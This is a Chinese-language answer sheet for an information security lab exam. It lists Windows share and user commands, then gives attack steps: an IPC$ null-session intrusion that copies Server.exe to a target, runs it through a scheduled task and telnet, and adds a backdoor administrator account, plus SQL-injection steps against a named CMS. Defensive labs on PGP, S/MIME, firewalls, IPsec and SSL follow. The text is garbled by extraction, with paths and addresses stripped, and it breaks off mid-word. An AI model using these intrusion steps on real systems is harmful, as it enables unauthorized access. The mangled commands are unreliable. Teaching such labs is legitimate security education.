信息安全技術(shù)與實(shí)施-實(shí)操考試是題答案

1、精選優(yōu)質(zhì)文檔-傾情為你奉上網(wǎng)絡(luò)安全技術(shù)實(shí)驗(yàn)net share zzz=d:zzz 共享d:zzz 共享名為zzznet use ipzzz 123 /user:zero用戶zero密碼123連接共享copy ipzzzxxx.xxx C:xxx.xxx從共享復(fù)制xxx.xxx到C:xxx.xxx添加管理員用戶net user zero 123 /add 添加zero用戶 密碼為123net localgroup administrators zero /add添加zero到administrators用戶組ftp open ?.?.?.?用戶名 密碼put x:xxx.xxx 上傳get xx

2、x.xxx x:xxx.xxx 下載bye 退出-IPC$攻擊net use ipipc$ "" /user:"" copy C:Server.exe ipipc$計(jì)劃任務(wù)net time ip 查看ip當(dāng)前時(shí)間at ip time Server.exetelnet ip添加管理員用戶如上題一.熟悉常見的系統(tǒng)命令在命令行下完成以下命令的功能使用：Net share（創(chuàng)建共享文件夾）C:>md 56C:>net share 56=c:5656 共享成功。Net use（訪問并復(fù)制共享文件夾中的內(nèi)容到本地計(jì)算機(jī)）net use ipzzz 123

3、 /user:zero用戶zero密碼123連接共享copy ipzzzxxx.xxx C:xxx.xxx從共享復(fù)制xxx.xxx到C:xxx.xxxNet user（創(chuàng)建用戶賬號、并將用戶添加到管理員組）ftp（完成FTP的上傳、下載）(一) IPC$攻擊利用IPC$漏洞對未打補(bǔ)丁的Windows計(jì)算機(jī)實(shí)施攻擊主要步驟：1. 掃描IPC$計(jì)算機(jī)2. 將Server.exe程序上傳到目標(biāo)機(jī)器E:實(shí)驗(yàn)工具IPC$攻擊工具>net use E:實(shí)驗(yàn)工具IPC$攻擊工具>copy E:實(shí)驗(yàn)工具IPC$攻擊工具SRV.EXE 1e$SRV.EXE3. 為目標(biāo)計(jì)算機(jī)指定

4、計(jì)劃任務(wù)E:實(shí)驗(yàn)工具IPC$攻擊工具>at 1 19:33 srv.exe4. 用Telnet命令連接sc 1 start tlntsvrtelnet 15. 添加管理員賬號E:>net user lijietian sotian /addE:>net localgroup administrators lijietian /add(二) SQL注入漏洞提權(quán)1. 將嘉楓文章管理系統(tǒng)發(fā)布到IIS上2. 用domain4.1進(jìn)行旁注檢測3. 猜解表名4. 猜解列名5. 破解用戶名、密碼6. 管理入口掃描7. 用得到

5、的管理員賬號登錄(三) 電子郵件安全（PGP）用PGP實(shí)現(xiàn)電子郵件的加密/簽名和解密/校驗(yàn)1. 配置Outlook Express可正確收發(fā)郵件2. 產(chǎn)生密鑰對3. 導(dǎo)入對方公鑰4. 簽名并信任對方公鑰5. 成功發(fā)送加密郵件，成功解密密文6. 成功發(fā)送簽名郵件，正確驗(yàn)證簽名7. 成功發(fā)送加密并簽名郵件，正確解密校驗(yàn)郵件(四) 電子郵件安全（S-MIME）用Outlook Express自帶的安全功能實(shí)現(xiàn)電子郵件的加密/簽名和解密/校驗(yàn)1. 配置Outlook Express可正確收發(fā)郵2. 下載安裝CA證書3. 申請并下載安裝電子郵件安全證書4. 獲得對方的數(shù)字標(biāo)識5. 成功發(fā)送加密郵件，成功

6、解密密文6. 成功發(fā)送簽名郵件，正確驗(yàn)證簽名7. 成功發(fā)送加密并簽名郵件，正確解密校驗(yàn)郵件(五) 防火墻ISA Server 2004通過配置防火墻策略實(shí)現(xiàn)如下內(nèi)容1. 在ISA主機(jī)上安裝IIS，并配置Web服務(wù)，網(wǎng)站首頁為自己的姓名和學(xué)號；2. 配置防火墻策略允許另一臺計(jì)算機(jī)可以訪問Web頁面；3. 在另一臺非ISA主機(jī)上安裝配置POP3服務(wù)，并配置郵件服務(wù)；4. 配置防火墻策略允許ISA主機(jī)訪問郵件服務(wù)。Ø 正確安裝IIS，并配置Web服務(wù)，首頁正確Ø 防火墻策略：允許訪問web服務(wù)，驗(yàn)證正確Ø 正確安裝POP3服務(wù)，并建立域和郵箱，能提供郵件服務(wù)Ø

7、 防火墻策略：允許ISA主機(jī)訪問郵件服務(wù)，可收發(fā)郵件(六) IP安全策略實(shí)現(xiàn)兩臺計(jì)算機(jī)之間所有IP通信的安全傳輸（要求使用證書進(jìn)行身份驗(yàn)證）1. 下載并安裝CA證書，使之成為受信任的根證書頒發(fā)機(jī)構(gòu)；2. 分別為兩臺主機(jī)申請并安裝客戶端身份證書；3. 配置IP安全策略（要求安全通信），要求僅在特定的兩臺主機(jī)之間實(shí)現(xiàn)IP安全通信4.5. 能夠完成IP安全通信，并驗(yàn)證。（可使用網(wǎng)絡(luò)監(jiān)視器或IPSec監(jiān)視器捕獲查看）SSL用SSL實(shí)現(xiàn)Web服務(wù)器和客戶端（瀏覽器）之間的安全通信（要求客戶端證書）。1. 在IIS的Web服務(wù)器中，生成證書申請文件；2. 為IIS的Web服務(wù)器申請證書；3. 下載并安裝該證書；4. 配置Web服務(wù)器，申請SSL安全通道，并要求客戶端證書；5. 為客戶機(jī)的瀏覽器申請瀏覽器證書并下載、安